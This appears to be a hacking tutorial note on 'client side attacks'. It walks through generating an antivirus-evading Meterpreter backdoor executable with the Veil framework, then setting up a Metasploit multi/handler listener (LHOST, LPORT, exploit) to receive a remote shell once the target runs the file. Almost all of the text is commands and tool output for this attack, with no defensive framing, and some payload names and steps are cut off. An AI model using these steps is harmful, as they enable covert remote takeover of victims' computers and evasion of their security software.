CLIENT SIDE ATTACKS - Backdooring exe' s

Download an executable file first.


A backdoor is a file that gives us full control over the machine that it gets executed on.

Backdoors can be caught by Anti-Virus programs.

Veil is a framework for generating Undetectable backdoors.

1. Run veil


Select tool 1 - Evasion.

2. List payloads and Select one

Veil/Evasion>: list
[Web]: | [Twitter]: @VeilFramework
=============================================================================== [*] Available Payloads: 1) autoit/shellcode_inject/ 2) auxiliary/
3) auxiliary/
4) auxiliary/ 5) c/meterpreter/
6) c/meterpreter/
7) c/meterpreter/
8) c/meterpreter/ 9) cs/meterpreter/
10) cs/meterpreter/
11) cs/meterpreter/
12) cs/shellcode_inject/
13) cs/shellcode_inject/ 14) go/meterpreter/
15) go/meterpreter/
16) go/meterpreter/
17) go/shellcode_inject/ 18) lua/shellcode_inject/ 19) perl/shellcode_inject/ 20) powershell/meterpreter/
21) powershell/meterpreter/
22) powershell/meterpreter/
23) powershell/shellcode_inject/
24) powershell/shellcode_inject/ 25) python/meterpreter/
26) python/meterpreter/
27) python/meterpreter/
28) python/meterpreter/
29) python/shellcode_inject/
30) python/shellcode_inject/
31) python/shellcode_inject/
32) python/shellcode_inject/
33) python/shellcode_inject/
34) python/shellcode_inject/
35) python/shellcode_inject/
36) python/shellcode_inject/ 37) ruby/meterpreter/
38) ruby/meterpreter/
39) ruby/meterpreter/
40) ruby/shellcode_inject/
41) ruby/shellcode_inject/

3. Generating an undetectable backdoor using Veil 3

use go/meterpreter/

set LPORT 8080
set SLEEP 6

4. Generate backdoor


Scan the file through

Run hander

1. Run Metasploit


2. Use the handler module.

use exploit/multi/handler

3. Set payload

set PAYLOAD [veil payload]

4. Set IP

set LHOST [your IP]

5. Set port

set LPORT [veil port]

6. exploit


Run the backdoor file on the target machine sucessfully.

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